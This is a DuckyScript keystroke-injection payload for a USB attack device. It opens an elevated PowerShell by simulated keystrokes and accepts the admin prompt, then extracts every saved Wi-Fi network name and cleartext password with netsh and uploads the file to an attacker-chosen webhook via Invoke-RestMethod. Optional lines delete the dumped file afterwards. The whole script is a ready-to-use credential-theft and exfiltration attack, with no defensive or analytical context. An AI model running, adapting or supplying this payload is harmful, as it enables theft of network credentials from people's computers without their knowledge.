REM -----------------------------------------------------------------------------
REM - LoZ's Access Point & Password Dump to webhook ~~<(-.-)>~~	
REM - Opens PowerShell as admin 
REM - Creates a .txt file, scans windows for all previously connected networks
REM - Adds AP name and associated password to .txt file 
REM - Sends .txt file to webhook
REM -----------------------------------------------------------------------------


REM - Opening PowerShell as admin
GUI r
DELAY 500
STRING powershell
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
LEFTARROW
DELAY 500
ENTER

REM - Creates a .txt file in the C drive, Calls webhook API
STRING $outputFile = "C:\WiFiProfilesAndPasswords.txt"
DELAY 500
ENTER

REM -------------------------------------------~<(-_-)>~-----------------------------------------

STRING $apiUrl = "Add You're Webhook link Between these Quotes"
DELAY 500
ENTER
REM -------------------------------------------~<(-_-)>~-----------------------------------------


REM - Scans windows for all prior connected networks and related passwords
STRING $profiles = netsh wlan show profiles | Select-String "All User Profile" | ForEach-Object { ($_ -split ":")[1].Trim() }
DELAY 100
ENTER
STRING foreach ($profile in $profiles) {
DELAY 100
ENTER
STRING Add-Content -Path $outputFile -Value "Profile: $profile"
DELAY 100
ENTER
STRING $password = netsh wlan show profile name="$profile" key=clear | Select-String "Key Content"
DELAY 100
ENTER
STRING if ($password) { Add-Content -Path $outputFile -Value $password }
DELAY 100
ENTER
STRING else { Add-Content -Path $outputFile -Value "Key Content: No password found" }
DELAY 100
ENTER
STRING Add-Content -Path $outputFile -Value "`n" }
DELAY 100
ENTER



REM - writing all APs and passwords to to .txt file 
STRING $fileBytes = [System.IO.File]::ReadAllBytes($outputFile)
DELAY 500
ENTER
STRING $boundary = [System.Guid]::NewGuid().ToString()
DELAY 500
ENTER
STRING $headers = @{
DELAY 100
ENTER
STRING "Content-Type" = "multipart/form-data; boundary=$boundary"
DELAY 100
ENTER
STRING }
DELAY 100
ENTER
STRING $body = "--$boundary`r`n"
DELAY 100
ENTER
STRING $body += "Content-Disposition: form-data; name=`"file`"; filename=`"WiFiProfilesAndPasswords.txt`"`r`n"
DELAY 100
ENTER
STRING $body += "Content-Type: text/plain`r`n`r`n"
DELAY 100
ENTER
STRING $body += [System.Text.Encoding]::UTF8.GetString($fileBytes)
DELAY 100
ENTER
STRING $body += "`r`n--$boundary--`r`n"
DELAY 100
ENTER



REM - Sending .txt file to Webhook
STRING $response = Invoke-RestMethod -Uri $apiUrl -Method Post -Headers $headers -Body $body
DELAY 100
ENTER
DELAY 1000

REM -------------------------------------------~<(-_-)>~-----------------------------------------
REM - Uncomment for testing purposes to get a response from your webhook to confirm functionality
REM STRING $response | Out-File -FilePath "C:\WebhookResponse.txt"
REM DELAY 75
REM ENTER
REM DELAY 5000
REM ---------------------------------------------------------------------------------------------

REM -----------------Uncomment if you want to delete the created .txt file-----------------------
REM STRING Remove-Item -Path "C:\WiFiProfilesAndPasswords.txt" -ErrorAction SilentlyContinue
REM DELAY 100
REM ENTER
REM -------------------------------------------~<(-_-)>~-----------------------------------------



REM - Closing PowerShell 
DELAY 500
STRING exit
DELAY 100
ENTER
